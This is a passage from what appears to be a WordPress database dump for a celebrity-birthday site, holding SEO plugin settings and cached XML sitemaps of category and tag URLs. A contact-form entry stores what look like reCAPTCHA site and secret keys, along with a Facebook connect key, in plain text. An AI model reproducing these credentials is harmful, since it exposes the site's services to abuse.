%%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(935,'wpseo_social','a:21:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"f771d71d4d27a075589be69b9b93289b\";s:13:\"facebook_site\";s:46:\"https://www.facebook.com/birthdaypedia?fref=ts\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:10:\"googleplus\";b:0;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:13:\"birthdaypedia\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:94:\"https://plus.google.com/b/116319998265805198916/116319998265805198916/about?hl=en&service=plus\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(936,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";}','yes'),(937,'wpseo_internallinks','a:10:{s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"»\";s:23:\"post_types-post-maintax\";i:0;}','yes'),(938,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:1;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(948,'revslider-valid-notice','false','yes'),(1131,'WPLANG','','yes'),(1526,'wpcf7','a:2:{s:7:\"version\";s:5:\"4.9.2\";s:9:\"recaptcha\";a:1:{s:40:\"6Lf9yREUAAAAAIRVWWsHNrA-DiaNsBYSq9GhN_E4\";s:40:\"6Lf9yREUAAAAABiQ-Mrax-nva5Pnt1rZniECqFeI\";}}','yes'),(3035,'_transient_wpseo_sitemap_cache_category_1','<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>http://birthdaypedia.com/category/movie-stars/movie-actor/actor/</loc>\n <lastmod>2015-07-29T13:18:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actor/actor-tv-actor/</loc>\n <lastmod>2015-07-29T13:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actress/actress/</loc>\n <lastmod>2015-08-20T19:18:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/movie-stars/movie-actress/actress-movie-actress/</loc>\n <lastmod>2015-08-20T12:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actress/actresscosplayer/</loc>\n <lastmod>2015-08-11T20:57:16+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/basketball/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/boxer/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/chef/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actor/comedian/</loc>\n <lastmod>2015-07-29T12:25:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/country-singer/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/director/</loc>\n <lastmod>2015-08-20T19:58:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/drummer/</loc>\n <lastmod>2015-07-23T23:11:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/entrepreneur/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/fashion-designer/</loc>\n <lastmod>2015-07-23T23:38:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/football/</loc>\n <lastmod>2015-07-29T12:23:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/funk-singer/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/guitarist/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/</loc>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/model/</loc>\n <lastmod>2015-07-29T13:20:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actress/model-tv-actress/</loc>\n <lastmod>2015-08-13T19:28:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/movie-stars/movie-actor/</loc>\n <lastmod>2015-08-20T19:39:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.6</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/movie-stars/movie-actress/</loc>\n <lastmod>2015-08-20T19:12:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/movie-stars/</loc>\n <lastmod>2015-07-29T12:10:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/</loc>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/politician/</loc>\n <lastmod>2015-08-11T20:49:19+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/pop-singer/</loc>\n <lastmod>2015-07-29T12:47:48+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/rb-singer/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/radio-host/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/rapper/</loc>\n <lastmod>2015-07-29T12:46:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actor/reality-star/</loc>\n <lastmod>2015-07-29T12:50:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/music-artists/rock-singer/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/skateboarding/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/soccer/</loc>\n <lastmod>2015-07-29T12:37:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/</loc>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actor/</loc>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actress/</loc>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/important-people/tv-host/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/tv-actor/tv-host-tv-actor/</loc>\n <lastmod>2015-07-29T13:15:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/category/sports/wrestler/</loc>\n <lastmod>2015-07-29T12:42:08+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n</urlset>','no'),(3192,'finished_splitting_shared_terms','1','yes'),(3265,'_transient_wpseo_sitemap_cache_post_tag_1','<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>http://birthdaypedia.com/tag/baby-i/</loc>\n <lastmod>2015-07-29T12:16:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/right-there/</loc>\n <lastmod>2015-07-29T12:16:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/101-dalmatians/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/21-jump-street/</loc>\n <lastmod>2015-07-29T12:38:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/2pac-shakur/</loc>\n <lastmod>2015-07-29T12:46:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/80s-famous-actor/</loc>\n <lastmod>2015-07-23T23:41:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/a-man-for-all-seasons/</loc>\n <lastmod>2015-07-29T12:48:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/aaron-paul/</loc>\n <lastmod>2015-08-20T20:12:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/abc-network-stars/</loc>\n <lastmod>2015-07-23T23:35:41+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/academy-awards/</loc>\n <lastmod>2015-08-20T18:47:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/academy-of-country-musics-artist-of-the-decade/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/activist-actress/</loc>\n <lastmod>2015-07-23T22:36:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/actor/</loc>\n <lastmod>2015-08-20T20:12:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/actors/</loc>\n <lastmod>2015-08-20T19:02:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/actrees/</loc>\n <lastmod>2015-08-13T19:57:54+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/actress/</loc>\n <lastmod>2015-08-20T19:18:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/alfred-hitchcock/</loc>\n <lastmod>2015-08-13T19:39:46+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/all-times-gratest-pop-singer/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/alyson-stoner/</loc>\n <lastmod>2015-08-13T19:12:54+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/amber-heard/</loc>\n <lastmod>2015-07-29T12:38:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/americas-best-voice/</loc>\n <lastmod>2015-07-29T12:31:37+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-actors-winner-at-cannes-film-festival/</loc>\n <lastmod>2015-07-23T23:41:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-actress/</loc>\n <lastmod>2015-07-23T22:51:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-entrepeneur/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-football/</loc>\n <lastmod>2015-07-29T11:59:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-idol-celebrities/</loc>\n <lastmod>2015-07-29T12:31:37+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-idol-judges/</loc>\n <lastmod>2015-07-29T12:08:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-model/</loc>\n <lastmod>2015-08-11T21:39:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/american-professional-wrestling/</loc>\n <lastmod>2015-07-29T12:30:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/amy-adams/</loc>\n <lastmod>2015-08-20T19:12:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/anaconda-cast/</loc>\n <lastmod>2015-07-23T23:52:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/anderson-hays-cooper/</loc>\n <lastmod>2015-07-29T13:15:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/andrea-pirlo/</loc>\n <lastmod>2015-07-29T12:37:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/angelina-jolie/</loc>\n <lastmod>2015-07-29T13:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/angelina-jolie-voight/</loc>\n <lastmod>2015-07-29T13:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/angels-hard-as-they-come-cast/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/anime/</loc>\n <lastmod>2015-08-11T20:57:16+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/antonio-banderas/</loc>\n <lastmod>2015-08-13T19:06:57+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/argentina/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/argentinian-basketbal-player/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/argentinian-soccer-player/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ariana-grande/</loc>\n <lastmod>2015-07-29T12:16:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ariana-grande-career/</loc>\n <lastmod>2015-07-29T12:16:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/arkansas-musician/</loc>\n <lastmod>2015-07-23T23:22:34+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/armani-fashion-designs/</loc>\n <lastmod>2015-07-23T23:38:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/arnold-schwarzenegger/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/as-good-as-it-gets/</loc>\n <lastmod>2015-07-29T12:27:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/audionet-creator/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/barack-obama/</loc>\n <lastmod>2015-08-11T20:49:19+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/barry-goosey/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/barry-manilow/</loc>\n <lastmod>2015-07-29T12:47:48+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/baywatch-celebrities/</loc>\n <lastmod>2015-07-23T22:36:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/baywatch-star/</loc>\n <lastmod>2015-07-23T23:44:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/beatles/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-actor/</loc>\n <lastmod>2015-08-13T18:52:17+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-chef/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-comedy-movies/</loc>\n <lastmod>2015-07-23T23:45:56+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-female-vocalist/</loc>\n <lastmod>2015-07-23T23:55:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-funk-singer/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-male-rock-vocal-performance-grammy/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-midfielder/</loc>\n <lastmod>2015-07-29T12:37:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-rb-singer/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-rapper/</loc>\n <lastmod>2015-07-29T12:36:05+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-rapper-ever/</loc>\n <lastmod>2015-07-29T12:46:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-soccer-player/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/best-soccer-team/</loc>\n <lastmod>2015-07-29T12:34:58+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/bicentennial-man-cast/</loc>\n <lastmod>2015-07-23T23:45:56+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/billboard-hot-country-songs/</loc>\n <lastmod>2015-07-29T12:21:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/blonde-celebrity/</loc>\n <lastmod>2015-08-11T21:52:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/blonde-model/</loc>\n <lastmod>2015-08-11T21:39:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/bloodsport-cast/</loc>\n <lastmod>2015-07-23T23:41:40+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/brandon-blackstone/</loc>\n <lastmod>2015-07-29T12:31:37+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/british-actor/</loc>\n <lastmod>2015-07-23T23:49:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/british-comedian/</loc>\n <lastmod>2015-07-29T12:41:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/british-musician/</loc>\n <lastmod>2015-07-23T23:11:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/california-governor/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/california-state-university-celebrities/</loc>\n <lastmod>2015-07-23T23:33:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/cara-delevingne/</loc>\n <lastmod>2015-08-13T19:28:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/casey-kasem/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ccw-wrestling/</loc>\n <lastmod>2015-07-29T12:42:08+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/celebreity-supporting-unicef/</loc>\n <lastmod>2015-07-23T23:46:04+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/celebrities-from-pennsylvania/</loc>\n <lastmod>2015-07-23T23:41:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/celebrities-in-dancing-with-the-stars/</loc>\n <lastmod>2015-07-23T23:44:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/celebrities-in-politics/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/celebrity-big-brother/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/channer-4-stars/</loc>\n <lastmod>2015-07-29T12:12:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/charlie-cast/</loc>\n <lastmod>2015-07-23T23:41:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/charlize-theron/</loc>\n 